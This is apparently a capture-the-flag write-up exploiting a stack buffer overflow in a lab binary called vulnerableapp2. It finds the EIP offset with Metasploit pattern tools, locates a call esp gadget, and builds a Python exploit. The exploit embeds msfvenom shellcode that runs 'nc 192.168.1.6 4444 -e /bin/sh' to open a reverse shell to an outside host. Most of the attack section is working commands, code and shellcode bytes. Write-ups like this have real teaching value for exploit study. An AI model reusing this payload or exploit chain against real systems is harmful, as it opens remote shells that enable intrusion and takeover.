First, I downloaded the application and gave it execute permission so that I can run it, as below:
$ chmod +x vulnerableapp2
After that I tried to run it the usual way a binary is run on Linux.
It turned out to crash with a segmentation fault, so I then tried a basic 4-byte input, namely "AAAA", as below:
$ ./vulnerableapp2 AAAA
The result is that the application runs normally and no longer produces the error seen at the beginning. Now we will give it input that exceeds the size of the buffer the application uses for it.
Our input succeeded in overflowing and crashing the application. Here I use a one-line python command to supply 800 bytes of the character A; this is the command:
$ ./vulnerableapp2 `python -c 'print "A" * 800'`
I have now learned that 800 bytes of input crash the application, so let's examine it in a debugger. Here I use pwndbg; if you don't have it or have trouble installing it, check my previous post.
We have entered the debugger, and here we will focus on the changes to the Extended Stack Pointer (ESP), Extended Base Pointer (EBP) and Extended Instruction Pointer (EIP) registers.
Note the role of each register, since each one matters for how our exploit will run later:
- Extended Stack Pointer (ESP): points to the top of the stack in memory, where the data the application is currently processing is stored.
- Extended Base Pointer (EBP): holds the base address of the current stack frame, from which the parameters and local variables of the running function are located.
- Extended Instruction Pointer (EIP): the pointer that tells the CPU the memory location of the next instruction to be executed.
Now we will retest from inside the debugger, this time supplying an 800-byte input generated by msf-pattern_create, so that the value that lands in EIP tells us the offset:
pwndbg> run `msf-pattern_create -l 800`
Starting program: /home/dig/CTF/soal2Excode/vulnerableapp2 `msf-pattern_create -l 800`
pwndbg> info registers eip
eip            0x35784134          0x35784134
pwndbg> exit
Undefined command: "exit".  Try "help".
pwndbg>
zsh: suspended  pwngdb ./vulnerableapp2
The crashed EIP now holds four bytes of the pattern, so msf-pattern_offset can tell us where in our input they sit:
$ msf-pattern_offset -q 0x35784134
[*] Exact match at offset 704
#!/usr/bin/python
# Python 2 script: the first draft of the exploit, with the gadget address still to be filled in.
import struct
fuzz = "A" * 704                  # padding up to the saved return address (offset 704 found above)
call_esp = 0x00000000             # placeholder: fill in with the address of the application's call esp gadget
eip = struct.pack("<I", call_esp)  # 4 bytes, little endian, overwriting the saved EIP
nop = "\x90" * 8                  # small NOP sled in front of the shellcode
- import struct, and the variable eip is filled using struct.pack, which encodes our address in the byte order the architecture uses in memory, i.e. little endian.
- then nop is the no-operation variable, which we set to 8 bytes of "\x90".
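To show how the offset of 704 follows from the EIP value 0x35784134, and why the address is packed little-endian, here is an added Python 3 example (my own code, not from the original post or from Metasploit) that reimplements the msf-pattern_create / msf-pattern_offset logic and also checks a candidate address against a bad-character list; the list is assumed from the msfvenom -b option used later in this post.

```python
import string
import struct

# Bad characters excluded later with msfvenom -b (assumed from that command).
BAD_CHARS = b"\x20\x0a\x0d\x00\x3f"


def pattern_create(length):
    """Cyclic pattern in the msf-pattern_create style: triples of (uppercase,
    lowercase, digit) emitted in order, so any 4-byte window occurs at exactly
    one position within the first 20280 bytes."""
    buf = ""
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                if len(buf) >= length:
                    return buf[:length]
                buf += upper + lower + digit
    return buf[:length]


def eip_bytes(addr):
    """4-byte little-endian encoding of an x86 address: the bytes written over
    the saved return address, i.e. struct.pack("<I", addr)."""
    return struct.pack("<I", addr)


def pattern_offset(eip_value, length=800):
    """Offset in the pattern at which the crashed EIP value was read.
    The register shows the 4 bytes as an integer, so decode it little-endian
    before searching; None if the value is not part of the pattern."""
    needle = eip_bytes(eip_value).decode("ascii", errors="replace")
    pos = pattern_create(length).find(needle)
    return None if pos < 0 else pos


def has_bad_chars(data, bad=BAD_CHARS):
    """True if any byte of data is in the bad-character list; use it to check
    that a gadget address or padding will survive the target's input handling."""
    return any(b in bad for b in data)


if __name__ == "__main__":
    print(pattern_offset(0x35784134))            # 704, as msf-pattern_offset reported
    print(has_bad_chars(eip_bytes(0xffffc4eb)))  # False: the gadget address contains no bad byte
```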
To redirect execution into our input on the stack, we search the binary for a call esp gadget with pwndbg's ropgadget command:
pwndbg> ropgadget --grep "call esp"
Saved corefile /tmp/tmp7twt6z73
0xffffc4eb : call esp
#!/usr/bin/python
# Python 2 script: same draft, now with the call esp gadget address filled in.
import struct
fuzz = "A" * 704                      # padding up to the saved return address
eip = struct.pack("<I", 0xffffc4eb)   # address of the call esp gadget, little endian
nop = "\x90" * 8                      # NOP sled in front of the shellcode
Next we generate the shellcode with msfvenom, excluding the bad characters and writing it out as a python variable named shellcode:
$ msfvenom -a x86 --platform linux -p linux/x86/exec CMD="nc 192.168.1.6 4444 -e /bin/sh" LHOST=192.168.1.6 LPORT=4444 -b "\x20\x0a\x0d\x00\x3f" -f python -v shellcode
#!/usr/bin/python
# Python 2 script (exploit.py): builds the full payload and writes it to stdout.
import struct
fuzz = "A" * 704                      # padding up to the saved return address
eip = struct.pack("<I", 0xffffc4eb)   # address of the call esp gadget, little endian
nop = "\x90" * 8                      # NOP sled in front of the shellcode
# shellcode as produced by the msfvenom command above
shellcode = b""
shellcode += b"\xb8\xa7\x29\xb5\x66\xdb\xcb\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x11\x31\x42\x14\x83\xc2\x04"
shellcode += b"\x03\x42\x10\x45\xdc\xdf\x6d\xd1\x86\x72\x14"
shellcode += b"\x89\x95\x11\x51\xae\x8e\xfa\x12\x58\x4f\x6d"
shellcode += b"\xfa\xfa\x26\x03\x8d\x19\xea\x33\x92\xdd\x0b"
shellcode += b"\xc4\xc3\xbe\x2b\xf5\x22\x72\x02\xc4\x62\x4a"
shellcode += b"\x74\x17\xa5\x9c\xa8\x63\x8d\xd4\x9c\xab\xc0"
shellcode += b"\x71\xfd\x84\x78\x10\x93\xf5\x0f\x8a\x6b\x5d"
shellcode += b"\xa3\xc3\x8d\xac\xc3"
# payload layout: padding | saved EIP -> call esp | NOP sled | shellcode
print fuzz + eip + nop + shellcode
Back in the debugger, we look up the gadget again, set a breakpoint on it and run the exploit:
pwndbg> ropgadget --grep "call esp"
Saved corefile /tmp/tmp7twt6z73
0xffffc4eb : call esp
pwndbg> break *0xffffc4eb
Breakpoint 1 at 0xffffc4eb
pwndbg> run `python exploit.py`
Execution stops at the breakpoint at 0xffffc4eb.
After this we continue with the commands:
pwndbg> x/100x $esp
pwndbg> x/100bx $esp
These dump the stack memory at ESP as words and as individual bytes. We then compare the bytes shown with the bytes of our shellcode to confirm that the shellcode sits on the stack exactly where ESP points, which is what the call esp gadget relies on.